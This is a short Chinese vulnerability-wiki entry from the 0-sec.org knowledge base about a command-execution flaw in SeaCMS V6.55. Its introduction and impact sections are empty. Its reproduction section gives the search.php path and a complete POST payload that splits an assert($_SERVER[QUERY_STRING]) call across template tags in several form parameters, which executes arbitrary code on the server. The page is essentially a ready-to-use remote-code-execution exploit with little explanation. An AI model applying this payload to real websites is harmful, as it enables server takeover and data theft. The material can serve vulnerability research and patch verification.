海洋CMS V6.55 命令执行

一、漏洞简介

二、漏洞影响

三、复现过程

path:

http://0-sec.org/search.php

POST:

searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-27 22:43:42

results matching ""

    No results matching ""